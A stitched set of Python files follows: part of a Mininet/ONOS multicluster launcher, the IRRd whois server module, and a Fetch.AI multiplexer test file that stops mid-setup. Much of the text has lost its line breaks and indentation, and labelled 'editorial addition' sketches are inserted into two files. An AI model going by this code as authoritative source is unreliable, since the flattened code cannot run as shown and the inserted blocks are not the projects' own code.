alpha_cluster.net.get('alpha_c1').cmd('/opt/onos/tools/dev/bash_profile') alpha_cluster.net.get('alpha_c1').cmd('/opt/onos-tennison-apps/install_apps_remote > onos-apps.log') beta_cluster.net.get('beta_c1').cmd('/opt/onos/tools/dev/bash_profile') beta_cluster.net.get('beta_c1').cmd('/opt/onos-tennison-apps/install_apps_remote > onos-apps.log') update_loading_bar(100, 'Loading complete') time.sleep(1) setLogLevel( 'info' ) info('\n') global Loading Loading = False ONOSCLI( net ) # run our special unified Mininet/ONOS CLI tennison_alpha.stop() tennison_beta.stop() net.stop() def update_loading_bar(increment, status): global Progress, Status Progress += increment Status = status def fixIPTables(): "Fix LinuxBridge warning" for s in 'arp', 'ip', 'ip6': quietRun( 'sysctl net.bridge.bridge-nf-call-%stables=0' % s ) Loading = True Progress = 0 Status = '' def loading_bar(): global Loading, Progress, Status while(Loading): time.sleep(0.5) Progress +=1 if Progress > 100: Progress = 100 Loading = False progress(Progress, 100, status=Status) time.sleep(0.5) def progress(count, total, status=''): if( not Loading ): return sys.stdout.write("\033[K") bar_len = 46 filled_len = int(round(bar_len * count / float(total))) percents = round(100.0 * count / 
float(total), 1)
    bar = '=' * filled_len + '-' * (bar_len - filled_len)
    sys.stdout.write('\r[%s] %s%s ...%s\r' % (bar, percents, '%', status))
    sys.stdout.flush()


# Add a "controllers" command to ONOSCLI

def do_controllers( self, line ):
    "List controllers assigned to switches"
    cmap = {}
    for s in self.mn.switches:
        c = getattr( s, 'controller', None ).name
        cmap.setdefault( c, [] ).append( s.name )
    for c in sorted( cmap.keys() ):
        switches = ' '.join( cmap[ c ] )
        print '%s: %s' % ( c, switches )

ONOSCLI.do_controllers = do_controllers


if __name__ == '__main__':
    try:
        run()
    except (KeyboardInterrupt, SystemExit):
        Loading = False
    except Exception as e:
        Loading = False
        error('ERROR: ' + str(e) + '\n')
        # sys.exit()
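# --- Hedged illustration (editorial addition, not part of multicluster.py) --
# A dependency-free sketch of the switch-to-cluster split used in run() above:
# the first half of the data-plane switches is attached to one ONOS cluster
# and the second half to the other. The 'alpha'/'beta' labels and the helper
# itself are hypothetical stand-ins for the real cluster objects.
def _assign_switches_demo( switch_names, first='alpha', second='beta' ):
    "Map each switch name to a cluster label using the same half-split rule."
    count = len( switch_names )
    return dict( ( name, first if i < count / 2 else second )
                 for i, name in enumerate( switch_names ) )
# e.g. a 10-switch LinearTopo: s1..s5 -> 'alpha', s6..s10 -> 'beta'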
server.py
import logging import multiprocessing as mp import os import signal import socket import socketserver import threading import time from IPy import IP from setproctitle import setproctitle from irrd.conf import get_setting, get_configuration from irrd.server.access_check import is_client_permitted from irrd.server.whois.query_parser import WhoisQueryParser from irrd.storage.database_handler import DatabaseHandler from irrd.storage.preload import Preloader logger = logging.getLogger(__name__) mp.allow_connection_pickling() # Covered by integration tests def start_whois_server(): # pragma: no cover """ Start the whois server, listening forever. This function does not return, except after SIGTERM is received. """ setproctitle('irrd-whois-server-listener') address = (get_setting('server.whois.interface'), get_setting('server.whois.port')) logger.info(f'Starting whois server on TCP {address}') server = WhoisTCPServer( server_address=address, ) # When this process receives SIGTERM, shut down the server cleanly. def sigterm_handler(signum, frame): nonlocal server def shutdown(server): logging.info('Whois server shutting down') server.shutdown() server.server_close() # Shutdown must be called from a thread to prevent blocking. threading.Thread(target=shutdown, args=(server,)).start() signal.signal(signal.SIGTERM, sigterm_handler) def sighup_handler(signum, frame): nonlocal server def sighup(server): get_configuration().reload() server.sighup_workers() # sighup must be called from a thread to prevent blocking. threading.Thread(target=sighup, args=(server,)).start() signal.signal(signal.SIGHUP, sighup_handler) server.serve_forever() class WhoisTCPServer(socketserver.TCPServer): # pragma: no cover """ Server for whois queries. Starts a number of worker processes that handle the client connections. Whenever a client is connected, the connection is pushed onto a queue, from which a worker picks it up. The workers are responsible for the connection from then on. """ allow_reuse_address = True request_queue_size = 50 def __init__(self, server_address, bind_and_activate=True): # noqa: N803 self.address_family = socket.AF_INET6 if IP(server_address[0]).version() == 6 else socket.AF_INET super().__init__(server_address, None, bind_and_activate) self.connection_queue = mp.Queue() self.workers = [] for i in range(int(get_setting('server.whois.max_connections'))): worker = WhoisWorker(self.connection_queue) worker.start() self.workers.append(worker) def process_request(self, request, client_address): """Push the client connection onto the queue for further handling.""" self.connection_queue.put((request, client_address)) def handle_error(self, request, client_address): logger.error(f'Error while handling request from {client_address}', exc_info=True) def sighup_workers(self): for worker in self.workers: os.kill(worker.pid, signal.SIGHUP) def shutdown(self): """ Shut down the server, by killing all child processes, and then deferring to built-in TCPServer shutdown. """ for worker in self.workers: try: worker.terminate() worker.join() except Exception: # pragma: no cover pass return super().shutdown() class WhoisWorker(mp.Process, socketserver.StreamRequestHandler): """ A whois worker is a process that handles whois client connections, which are retrieved from a queue. 
After handling a connection, the process waits for the next connection from the queue.s """ def __init__(self, connection_queue, *args, **kwargs): self.connection_queue = connection_queue # Note that StreamRequestHandler.__init__ is not called - the # input for that is not available, as it's retrieved from the queue. super().__init__(*args, **kwargs) def run(self, keep_running=True) -> None: """ Whois worker run loop. This method does not return, except if it failed to initialise a preloader, or if keep_running is set, after the first request is handled. The latter is used in the tests. """ # Disable the special sigterm_handler defined in start_whois_server() # (signal handlers are inherited) signal.signal(signal.SIGTERM, signal.SIG_DFL) try: self.preloader = Preloader() self.database_handler = DatabaseHandler(readonly=True) except Exception as e: logger.error(f'Whois worker failed to initialise preloader or database,' f'unable to start, traceback follows: {e}', exc_info=e) return while True: try: setproctitle('irrd-whois-worker') self.request, self.client_address = self.connection_queue.get() self.setup() self.handle_connection() self.finish() self.close_request() except Exception as e: try: self.close_request() except Exception: # pragma: no cover pass logger.error(f'Failed to handle whois connection, traceback follows: {e}', exc_info=e) if not keep_running: break def close_request(self): # Close the connection in the same way normally done by TCPServer try: # explicitly shutdown. socket.close() merely releases # the socket and waits for GC to perform the actual close. self.request.shutdown(socket.SHUT_WR) except OSError: # pragma: no cover pass # some platforms may raise ENOTCONN here self.request.close() def handle_connection(self): """ Handle an individual whois client connection. When this method returns, the connection is closed. """ client_ip = self.client_address[0] self.client_str = client_ip + ':' + str(self.client_address[1]) setproctitle(f'irrd-whois-worker-{self.client_str}') if not self.is_client_permitted(client_ip): self.wfile.write(b'%% Access denied') return self.query_parser = WhoisQueryParser(client_ip, self.client_str, self.preloader, self.database_handler) data = True while data: timer = threading.Timer(self.query_parser.timeout, self.close_request) timer.start() data = self.rfile.readline() timer.cancel() query = data.decode('utf-8', errors='backslashreplace').strip() if not query: continue logger.debug(f'{self.client_str}: processing query: {query}') if not self.handle_query(query): return def handle_query(self, query: str) -> bool: """ Handle an individual query. Returns False when the connection should be closed, True when more queries should be read. """ start_time = time.perf_counter() if query.upper() == '!Q': logger.debug(f'{self.client_str}: closed connection per request') return False response = self.query_parser.handle_query(query) response_bytes = response.generate_response().encode('utf-8') try: self.wfile.write(response_bytes) except OSError: return False elapsed = time.perf_counter() - start_time logger.info(f'{self.client_str}: sent answer to query, elapsed {elapsed:.9f}s, ' f'{len(response_bytes)} bytes: {query}') if not self.query_parser.multiple_command_mode: logger.debug(f'{self.client_str}: auto-closed connection') return False return True def is_client_permitted(self, ip: str) -> bool: """ Check whether a client is permitted. """ return is_client_permitted(ip, 'server.whois.access_list', default_deny=False)
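# --- Hedged illustration (editorial addition, not part of server.py) --------
# A minimal sketch of the worker pattern described in the WhoisTCPServer
# docstring: the listener pushes work onto a multiprocessing queue and
# long-lived worker processes pull items off it. This sketch passes plain
# strings instead of client sockets; all names below are hypothetical and it
# reuses the mp/logger/os imports already present at the top of this module.
def _demo_worker(queue):
    while True:
        item = queue.get()
        if item is None:  # sentinel: tell the worker to exit
            break
        logger.info('demo worker %s handled %r', os.getpid(), item)


def _queue_worker_demo(num_workers=2, num_items=4):
    queue = mp.Queue()
    workers = [mp.Process(target=_demo_worker, args=(queue,)) for _ in range(num_workers)]
    for worker in workers:
        worker.start()
    for i in range(num_items):
        queue.put('request-%d' % i)  # stands in for (request, client_address)
    for _ in workers:
        queue.put(None)  # one sentinel per worker
    for worker in workers:
        worker.join()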
test_multiplexer.py
# -*- coding: utf-8 -*- # ------------------------------------------------------------------------------ # # Copyright 2018-2019 Fetch.AI Limited # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # # ------------------------------------------------------------------------------ """This module contains the tests for the Multiplexer.""" import asyncio import logging import os import shutil import sys import tempfile import time import unittest.mock from pathlib import Path from threading import Thread from unittest import mock from unittest.mock import MagicMock, Mock, call, patch import pytest from pexpect.exceptions import EOF # type: ignore import aea from aea.cli.core import cli from aea.configurations.constants import DEFAULT_LEDGER from aea.connections.base import ConnectionStates from aea.helpers.exception_policy import ExceptionPolicyEnum from aea.identity.base import Identity from aea.mail.base import AEAConnectionError, Envelope, EnvelopeContext from aea.multiplexer import AsyncMultiplexer, InBox, Multiplexer, OutBox from aea.test_tools.click_testing import CliRunner from packages.fetchai.connections.local.connection import LocalNode from packages.fetchai.connections.p2p_libp2p.connection import ( PUBLIC_ID as P2P_PUBLIC_ID, ) from packages.fetchai.connections.stub.connection import PUBLIC_ID as STUB_CONNECTION_ID from packages.fetchai.protocols.default.message import DefaultMessage from packages.fetchai.protocols.fipa.message import FipaMessage from .conftest import ( AUTHOR, CLI_LOG_OPTION, ROOT_DIR, UNKNOWN_CONNECTION_PUBLIC_ID, UNKNOWN_PROTOCOL_PUBLIC_ID, _make_dummy_connection, _make_local_connection, _make_stub_connection, logger, ) from tests.common.pexpect_popen import PexpectWrapper from tests.common.utils import wait_for_condition UnknownProtocolMock = Mock() UnknownProtocolMock.protocol_id = UNKNOWN_PROTOCOL_PUBLIC_ID UnknownProtocolMock.protocol_specification_id = UNKNOWN_PROTOCOL_PUBLIC_ID @pytest.mark.asyncio async def test_receiving_loop_terminated(): """Test that connecting twice the multiplexer behaves correctly.""" multiplexer = Multiplexer([_make_dummy_connection()]) multiplexer.connect() with unittest.mock.patch.object(multiplexer.logger, "debug") as mock_logger_debug: multiplexer.connection_status.set(ConnectionStates.disconnected) await multiplexer._receiving_loop() mock_logger_debug.assert_called_with("Receiving loop terminated.") multiplexer.connection_status.set(ConnectionStates.connected) multiplexer.disconnect() def test_connect_twice(): """Test that connecting twice the multiplexer behaves correctly.""" multiplexer = Multiplexer([_make_dummy_connection()]) assert not multiplexer.connection_status.is_connected multiplexer.connect() assert multiplexer.connection_status.is_connected multiplexer.connect() assert multiplexer.connection_status.is_connected multiplexer.disconnect() def test_disconnect_twice(): """Test that connecting twice the multiplexer behaves correctly.""" multiplexer = Multiplexer([_make_dummy_connection()]) assert not 
multiplexer.connection_status.is_connected multiplexer.connect() assert multiplexer.connection_status.is_connected multiplexer.disconnect() multiplexer.disconnect() def test_connect_twice_with_loop(): """Test that connecting twice the multiplexer behaves correctly.""" running_loop = asyncio.new_event_loop() thread_loop = Thread(target=running_loop.run_forever) thread_loop.start() try: multiplexer = Multiplexer([_make_dummy_connection()], loop=running_loop) with unittest.mock.patch.object( multiplexer.logger, "debug" ) as mock_logger_debug: assert not multiplexer.connection_status.is_connected multiplexer.connect() assert multiplexer.connection_status.is_connected multiplexer.connect() assert multiplexer.connection_status.is_connected mock_logger_debug.assert_called_with("Multiplexer already connected.") multiplexer.disconnect() running_loop.call_soon_threadsafe(running_loop.stop) finally: thread_loop.join() @pytest.mark.asyncio async def test_connect_twice_a_single_connection(): """Test that connecting twice a single connection behaves correctly.""" connection = _make_dummy_connection() multiplexer = Multiplexer([connection]) assert not multiplexer.connection_status.is_connected await multiplexer._connect_one(connection.connection_id) with unittest.mock.patch.object(multiplexer.logger, "debug") as mock_logger_debug: await multiplexer._connect_one(connection.connection_id) mock_logger_debug.assert_called_with( "Connection fetchai/dummy:0.1.0 already established." ) await multiplexer._disconnect_one(connection.connection_id) @pytest.mark.asyncio async def test_run_bad_conneect(): """Test that connecting twice a single connection behaves correctly.""" connection = _make_dummy_connection() multiplexer = AsyncMultiplexer([connection]) f = asyncio.Future() f.set_result(None) with unittest.mock.patch.object(multiplexer, "connect", return_value=f): with pytest.raises(ValueError, match="Multiplexer is not connected properly."): await multiplexer.run() def test_multiplexer_connect_all_raises_error(): """Test the case when the multiplexer raises an exception while connecting.""" multiplexer = Multiplexer([_make_dummy_connection()]) with unittest.mock.patch.object(multiplexer, "_connect_all", side_effect=Exception): with pytest.raises( AEAConnectionError, match="Failed to connect the multiplexer." ): multiplexer.connect() multiplexer.disconnect() def test_multiplexer_connect_one_raises_error_many_connections(): """Test the case when the multiplexer raises an exception while attempting the connection of one connection.""" node = LocalNode() tmpdir = Path(tempfile.mkdtemp()) d = tmpdir / "test_stub" d.mkdir(parents=True) input_file_path = d / "input_file.csv" output_file_path = d / "input_file.csv" connection_1 = _make_local_connection("my_addr", node) connection_2 = _make_stub_connection(input_file_path, output_file_path) connection_3 = _make_dummy_connection() multiplexer = Multiplexer([connection_1, connection_2, connection_3]) assert not connection_1.is_connected assert not connection_2.is_connected assert not connection_3.is_connected with unittest.mock.patch.object(connection_3, "connect", side_effect=Exception): with pytest.raises( AEAConnectionError, match="Failed to connect the multiplexer." 
): multiplexer.connect() assert not connection_1.is_connected assert not connection_2.is_connected assert not connection_3.is_connected multiplexer.disconnect() try: shutil.rmtree(tmpdir) except OSError as e: logger.warning("Couldn't delete {}".format(tmpdir)) logger.exception(e) @pytest.mark.asyncio async def test_disconnect_twice_a_single_connection(): """Test that connecting twice a single connection behaves correctly.""" connection = _make_dummy_connection() multiplexer = Multiplexer([_make_dummy_connection()]) assert not multiplexer.connection_status.is_connected with unittest.mock.patch.object(multiplexer.logger, "debug") as mock_logger_debug: await multiplexer._disconnect_one(connection.connection_id) mock_logger_debug.assert_called_with( "Connection fetchai/dummy:0.1.0 already disconnected." ) def test_multiplexer_disconnect_all_raises_error(): """Test the case when the multiplexer raises an exception while disconnecting.""" multiplexer = Multiplexer([_make_dummy_connection()]) multiplexer.connect() assert multiplexer.connection_status.is_connected with unittest.mock.patch.object( multiplexer, "_disconnect_all", side_effect=Exception ): with pytest.raises( AEAConnectionError, match="Failed to disconnect the multiplexer." ): multiplexer.disconnect() # # do the true disconnection - for clean the test up assert multiplexer.connection_status.is_disconnecting multiplexer.disconnect() assert multiplexer.connection_status.is_disconnected @pytest.mark.asyncio async def test_multiplexer_disconnect_one_raises_error_many_connections(): """Test the case when the multiplexer raises an exception while attempting the disconnection of one connection.""" with LocalNode() as node: tmpdir = Path(tempfile.mkdtemp()) d = tmpdir / "test_stub" d.mkdir(parents=True) input_file_path = d / "input_file.csv" output_file_path = d / "input_file.csv" connection_1 = _make_local_connection("my_addr", node) connection_2 = _make_stub_connection(input_file_path, output_file_path) connection_3 = _make_dummy_connection() multiplexer = Multiplexer([connection_1, connection_2, connection_3]) assert not connection_1.is_connected assert not connection_2.is_connected assert not connection_3.is_connected multiplexer.connect() assert connection_1.is_connected assert connection_2.is_connected assert connection_3.is_connected with unittest.mock.patch.object( connection_3, "disconnect", side_effect=Exception ): with pytest.raises( AEAConnectionError, match="Failed to disconnect the multiplexer." ): multiplexer.disconnect() assert not connection_1.is_connected assert not connection_2.is_connected assert connection_3.is_connected # clean the test up. await connection_3.disconnect() multiplexer.disconnect() try: shutil.rmtree(tmpdir) except OSError as e: logger.warning("Couldn't delete {}".format(tmpdir)) logger.exception(e) @pytest.mark.asyncio async def test_sending_loop_does_not_start_if_multiplexer_not_connected(): """Test that the sending loop is stopped does not start if the multiplexer is not connected.""" multiplexer = Multiplexer([_make_dummy_connection()]) with unittest.mock.patch.object(multiplexer.logger, "debug") as mock_logger_debug: await multiplexer._send_loop() mock_logger_debug.assert_called_with( "Sending loop not started. The multiplexer is not connected." 
) @pytest.mark.asyncio async def test_sending_loop_cancelled(): """Test the case when the sending loop is cancelled.""" multiplexer = Multiplexer([_make_dummy_connection()]) multiplexer.connect() await asyncio.sleep(0.1) with unittest.mock.patch.object(multiplexer.logger, "debug") as mock_logger_debug: multiplexer.disconnect() mock_logger_debug.assert_any_call("Sending loop cancelled.") @pytest.mark.asyncio async def test_receiving_loop_raises_exception(): """Test the case when an error occurs when a receive is started.""" connection = _make_dummy_connection() multiplexer = Multiplexer([connection]) with unittest.mock.patch("asyncio.wait", side_effect=Exception("a weird error.")): with unittest.mock.patch.object( multiplexer.logger, "error" ) as mock_logger_error: multiplexer.connect() time.sleep(0.1) mock_logger_error.assert_called_with( "Error in the receiving loop: a weird error.", exc_info=True ) multiplexer.disconnect() @pytest.mark.asyncio async def test_send_envelope_with_non_registered_connection(): """Test that sending an envelope with an unregistered connection raises an exception.""" connection = _make_dummy_connection() multiplexer = Multiplexer([connection], protocols=[DefaultProtocolMock]) multiplexer.connect() envelope = Envelope( to="", sender="", protocol_specification_id=DefaultMessage.protocol_specification_id, message=b"", context=EnvelopeContext(connection_id=UNKNOWN_CONNECTION_PUBLIC_ID), ) with unittest.mock.patch.object( multiplexer.logger, "warning" ) as mock_logger_warning: await multiplexer._send(envelope) mock_logger_warning.assert_called_with( f"Dropping envelope, no connection available for sending: {envelope}" ) multiplexer.disconnect() @pytest.mark.asyncio async def test_send_envelope_when_no_connection(): """Test that sending an envelope with no connection logs a warning.""" multiplexer = Multiplexer([], protocols=[DefaultProtocolMock]) multiplexer.connect() envelope = Envelope( to="", sender="", protocol_specification_id=DefaultMessage.protocol_specification_id, message=b"", ) with unittest.mock.patch.object( multiplexer.logger, "warning" ) as mock_logger_warning: await multiplexer._send(envelope) mock_logger_warning.assert_called_with( f"Dropping envelope, no connection available for sending: {envelope}" ) multiplexer.disconnect() def test_send_envelope_error_is_logged_by_send_loop(): """Test that the AEAConnectionError in the '_send' method is logged by the '_send_loop'.""" connection = _make_dummy_connection() multiplexer = Multiplexer([connection], protocols=[DefaultProtocolMock]) multiplexer.connect() fake_connection_id = UNKNOWN_CONNECTION_PUBLIC_ID envelope = Envelope( to="", sender="", protocol_specification_id=DefaultMessage.protocol_specification_id, message=b"", context=EnvelopeContext(connection_id=fake_connection_id), ) with unittest.mock.patch.object(multiplexer.logger, "error") as mock_logger_error: multiplexer.put(envelope) time.sleep(0.1) mock_logger_error.assert_called_with( "No connection registered with id: {}".format(fake_connection_id) ) multiplexer.disconnect() def test_get_from_multiplexer_when_empty(): """Test that getting an envelope from the multiplexer when the input queue is empty raises an exception.""" connection = _make_dummy_connection() multiplexer = Multiplexer([connection]) with pytest.raises(aea.mail.base.Empty): multiplexer.get() def test_send_message_no_supported_protocol(): """Test the case when we send an envelope with a specific connection that does not support the protocol.""" with LocalNode() as node: identity_1 
= Identity("identity", address="address_1") connection_1 = _make_local_connection( identity_1.address, node, restricted_to_protocols={DefaultMessage.protocol_id}, excluded_protocols={FipaMessage.protocol_id}, ) multiplexer = Multiplexer( [connection_1], protocols=[DefaultMessage, FipaMessage, UnknownProtocolMock] ) multiplexer.connect() with mock.patch.object(multiplexer.logger, "warning") as mock_logger_warning: envelope = Envelope( to=identity_1.address, sender=identity_1.address, protocol_specification_id=FipaMessage.protocol_specification_id, message=b"some bytes", ) multiplexer.put(envelope) time.sleep(0.5) mock_logger_warning.assert_called_with( "Connection {} does not support protocol {}. It is explicitly excluded.".format( connection_1.connection_id, FipaMessage.protocol_id ) ) with mock.patch.object(multiplexer.logger, "warning") as mock_logger_warning: envelope = Envelope( to=identity_1.address, sender=identity_1.address, protocol_specification_id=UnknownProtocolMock.protocol_specification_id, message=b"some bytes", ) multiplexer.put(envelope) time.sleep(0.5) mock_logger_warning.assert_called_with( "Connection {} does not support protocol {}. The connection is restricted to protocols in {}.".format( connection_1.connection_id, UnknownProtocolMock.protocol_id, connection_1.restricted_to_protocols, ) ) multiplexer.disconnect() def test_protocol_not_resolved(): """Test multiplexer raises ValueError on protocol not resolved.""" multiplexer = Multiplexer([Mock()]) envelope = Envelope( to="1", sender="2", protocol_specification_id=FipaMessage.protocol_specification_id, message=b"some bytes", ) with pytest.raises(ValueError): multiplexer._get_protocol_id_for_envelope(envelope) def test_autoset_default_connection(): """Set default connection automatically.""" connection_1 = _make_dummy_connection() connection_2 = _make_dummy_connection() connections = [connection_1, connection_2] multiplexer = Multiplexer(connections) multiplexer._default_connection = None multiplexer._set_default_connection_if_none() assert multiplexer._default_connection == connections[0] def test__get_connection(): """Test the method _get_connection.""" connection_1 = _make_dummy_connection() connections = [connection_1] multiplexer = Multiplexer(connections) conn_ = multiplexer._get_connection(connection_1.connection_id.to_any()) assert conn_ == connection_1 @pytest.mark.asyncio async def test_disconnect_when_not_connected(): """Test disconnect when not connected.""" connection_1 = _make_dummy_connection() connections = [connection_1] multiplexer = AsyncMultiplexer(connections) with patch.object(multiplexer, "_disconnect_all") as disconnect_all_mocked: await multiplexer.disconnect() disconnect_all_mocked.assert_not_called() @pytest.mark.asyncio async def test_exit_on_none_envelope(): """Test sending task exit on None envelope.""" connection_1 = _make_dummy_connection() connections = [connection_1] multiplexer = AsyncMultiplexer(connections, loop=asyncio.get_event_loop()) try: await multiplexer.connect() assert multiplexer.is_connected multiplexer.put(None) await asyncio.sleep(0.5) assert multiplexer._send_loop_task.done() finally: await multiplexer.disconnect() @pytest.mark.asyncio async def test_inbox_outbox(): """Test InBox OutBox objects.""" connection_1 = _make_dummy_connection() connections = [connection_1] multiplexer = AsyncMultiplexer(connections, loop=asyncio.get_event_loop()) msg = DefaultMessage(performative=DefaultMessage.Performative.BYTES, content=b"",) msg.to = "to" msg.sender = "sender" envelope = 
Envelope(to="to", sender="sender", message=msg,) try: await multiplexer.connect() inbox = InBox(multiplexer) outbox = OutBox(multiplexer) assert inbox.empty() assert outbox.empty() outbox.put(envelope) received = await inbox.async_get() assert received == envelope assert inbox.empty() assert outbox.empty() outbox.put_message(msg) await inbox.async_wait() received = inbox.get_nowait() assert received == envelope finally: await multiplexer.disconnect() @pytest.mark.asyncio async def test_threaded_mode(): """Test InBox OutBox objects in threaded mode.""" connection_1 = _make_dummy_connection() connections = [connection_1] multiplexer = AsyncMultiplexer(connections, threaded=True) msg = DefaultMessage(performative=DefaultMessage.Performative.BYTES, content=b"",) msg.to = "to" msg.sender = "sender" envelope = Envelope(to="to", sender="sender", message=msg) try: await multiplexer.connect() await asyncio.sleep(0.5) inbox = InBox(multiplexer) outbox = OutBox(multiplexer) assert inbox.empty() assert outbox.empty() outbox.put(envelope) received = await inbox.async_get() assert received == envelope assert inbox.empty() assert outbox.empty() outbox.put_message(msg) await inbox.async_wait() received = inbox.get_nowait() assert received == envelope finally: await multiplexer.disconnect() @pytest.mark.asyncio async def test_outbox_negative(): """Test InBox OutBox objects.""" connection_1 = _make_dummy_connection() connections = [connection_1] multiplexer = AsyncMultiplexer(connections, loop=asyncio.get_event_loop()) msg = DefaultMessage(performative=DefaultMessage.Performative.BYTES, content=b"",) context = EnvelopeContext(connection_id=connection_1.connection_id) envelope = Envelope( to="to", sender="sender", protocol_specification_id=msg.protocol_specification_id, message=b"", context=context, ) try: await multiplexer.connect() outbox = OutBox(multiplexer) assert outbox.empty() with pytest.raises(ValueError) as execinfo: outbox.put(envelope) assert ( str(execinfo.value) == "Only Message type allowed in envelope message field when putting into outbox." ) assert outbox.empty() with pytest.raises(ValueError) as execinfo: outbox.put_message("") assert str(execinfo.value) == "Provided message not of type Message." assert outbox.empty() with pytest.raises(ValueError) as execinfo: outbox.put_message(msg) assert str(execinfo.value) == "Provided message has message.to not set." assert outbox.empty() msg.to = "to" with pytest.raises(ValueError) as execinfo: outbox.put_message(msg) assert str(execinfo.value) == "Provided message has message.sender not set." 
finally: await multiplexer.disconnect() DefaultProtocolMock = Mock() DefaultProtocolMock.protocol_id = DefaultMessage.protocol_id DefaultProtocolMock.protocol_specification_id = DefaultMessage.protocol_specification_id @pytest.mark.asyncio async def test_default_route_applied(caplog): """Test default route is selected automatically.""" logger = logging.getLogger("aea.multiplexer") with caplog.at_level(logging.DEBUG, logger="aea.multiplexer"): connection_1 = _make_dummy_connection() connections = [connection_1] multiplexer = AsyncMultiplexer( connections, loop=asyncio.get_event_loop(), protocols=[DefaultProtocolMock] ) multiplexer.logger = logger envelope = Envelope( to="", sender="", protocol_specification_id=DefaultMessage.protocol_specification_id, message=b"", context=EnvelopeContext(), ) multiplexer.default_routing = { DefaultMessage.protocol_id: connection_1.connection_id } try: await multiplexer.connect() inbox = InBox(multiplexer) outbox = InBox(multiplexer) assert inbox.empty() assert outbox.empty() multiplexer.put(envelope) await outbox.async_get() finally: await multiplexer.disconnect() assert "Using default routing:" in caplog.text @pytest.mark.asyncio async def test_connection_id_in_to_field_detected(caplog): """Test to field is parsed correctly and used for routing.""" logger = logging.getLogger("aea.multiplexer") with caplog.at_level(logging.DEBUG, logger="aea.multiplexer"): connection_1 = _make_dummy_connection() connections = [connection_1] multiplexer = AsyncMultiplexer( connections, loop=asyncio.get_event_loop(), protocols=[DefaultProtocolMock] ) multiplexer.logger = logger envelope = Envelope( to=str(connection_1.connection_id), sender="some_author/some_skill:0.1.0", protocol_specification_id=DefaultMessage.protocol_specification_id, message=b"", ) try: await multiplexer.connect() inbox = InBox(multiplexer) outbox = InBox(multiplexer) assert inbox.empty() assert outbox.empty() multiplexer.put(envelope) await outbox.async_get() finally: await multiplexer.disconnect() assert "Using envelope `to` field as connection_id:" in caplog.text @pytest.mark.asyncio async def test_routing_helper_applied(caplog): """Test the routing helper is used for routing.""" logger = logging.getLogger("aea.multiplexer") with caplog.at_level(logging.DEBUG, logger="aea.multiplexer"): connection_1 = _make_dummy_connection() connections = [connection_1] multiplexer = AsyncMultiplexer( connections, loop=asyncio.get_event_loop(), protocols=[DefaultProtocolMock] ) multiplexer.logger = logger envelope = Envelope( to="test", sender="", protocol_specification_id=DefaultMessage.protocol_specification_id, message=b"", ) multiplexer._routing_helper[envelope.to] = connection_1.connection_id try: await multiplexer.connect() inbox = InBox(multiplexer) outbox = InBox(multiplexer) assert inbox.empty() assert outbox.empty() multiplexer.put(envelope) await outbox.async_get() finally: await multiplexer.disconnect() assert ( f"Using routing helper with connection_id: {connection_1.connection_id}" in caplog.text ) def test_multiplexer_setup(): """Test multiplexer setup to set connections.""" node = LocalNode() tmpdir = Path(tempfile.mkdtemp()) d = tmpdir / "test_stub" d.mkdir(parents=True) input_file_path = d / "input_file.csv" output_file_path = d / "input_file.csv" connection_1 = _make_local_connection("my_addr", node) connection_2 = _make_stub_connection(input_file_path, output_file_path) connection_3 = _make_dummy_connection() connections = [connection_1, connection_2, connection_3] multiplexer = Multiplexer([]) 
with unittest.mock.patch.object(multiplexer.logger, "debug") as mock_logger_debug: multiplexer._connection_consistency_checks() mock_logger_debug.assert_called_with("List of connections is empty.") multiplexer._setup(connections, default_routing=None) multiplexer._connection_consistency_checks() class TestExceptionHandlingOnConnectionSend: """Test exception handling policy on connection.send.""" def setup(self): """Set up test case.""" self.connection = _make_dummy_connection() self.multiplexer = Multiplexer( [self.connection], protocols=[DefaultProtocolMock] ) self.multiplexer.connect() self.envelope = Envelope( to="", sender="", protocol_specification_id=DefaultMessage.protocol_specification_id, message=b"", context=EnvelopeContext(connection_id=self.connection.connection_id), ) self.exception = ValueError("expected") def teardown(self): """Tear down test case.""" self.multiplexer.disconnect() def test_log_policy(self): """Test just log exception.""" with patch.object(self.connection, "send", side_effect=self.exception): self.multiplexer._exception_policy = ExceptionPolicyEnum.just_log self.multiplexer.put(self.envelope) time.sleep(1) assert not self.multiplexer._send_loop_task.done() def test_propagate_policy(self): """Test propagate exception.""" assert self.multiplexer._exception_policy == ExceptionPolicyEnum.propagate with patch.object(self.connection, "send", side_effect=self.exception): self.multiplexer.put(self.envelope) time.sleep(1) wait_for_condition( lambda: self.multiplexer._send_loop_task.done(), timeout=5 ) assert self.multiplexer._send_loop_task.exception() == self.exception def test_stop_policy(self): """Test stop multiplexer on exception.""" with patch.object(self.connection, "send", side_effect=self.exception): self.multiplexer._exception_policy = ExceptionPolicyEnum.stop_and_exit self.multiplexer.put(self.envelope) time.sleep(1) wait_for_condition( lambda: self.multiplexer.connection_status.is_disconnected, timeout=5 ) def test_disconnect_order(self): """Test disconnect order: tasks first, disconnect_all next.""" parent = MagicMock() async def fn(): return with patch.object( self.multiplexer, "_stop_receive_send_loops", return_value=fn() ) as stop_loops, patch.object( self.multiplexer, "_disconnect_all", return_value=fn() ) as disconnect_all, patch.object( self.multiplexer, "_check_and_set_disconnected_state" ) as check_and_set_disconnected_state: parent.attach_mock(stop_loops, "stop_loops") parent.attach_mock(disconnect_all, "disconnect_all") parent.attach_mock( check_and_set_disconnected_state, "check_and_set_disconnected_state" ) self.multiplexer.disconnect() assert parent.mock_calls == [ call.stop_loops(), call.disconnect_all(), call.check_and_set_disconnected_state(), ] class TestMultiplexerDisconnectsOnTermination: # pylint: disable=attribute-defined-outside-init """Test multiplexer disconnects on agent process keyboard interrupted.""" def setup(self): """Set the test up.""" self.proc = None self.runner = CliRunner() self.agent_name = "myagent" self.cwd = os.getcwd() self.t = tempfile.mkdtemp() shutil.copytree(Path(ROOT_DIR, "packages"), Path(self.t, "packages")) os.chdir(self.t) self.key_path = os.path.join(self.t, "fetchai_private_key.txt") self.conn_key_path = os.path.join(self.t, "conn_private_key.txt") result = self.runner.invoke( cli, [*CLI_LOG_OPTION, "init", "--local", "--author", AUTHOR] ) assert result.exit_code == 0 result = self.runner.invoke( cli, [*CLI_LOG_OPTION, "create", "--local", self.agent_name] ) assert result.exit_code == 0 
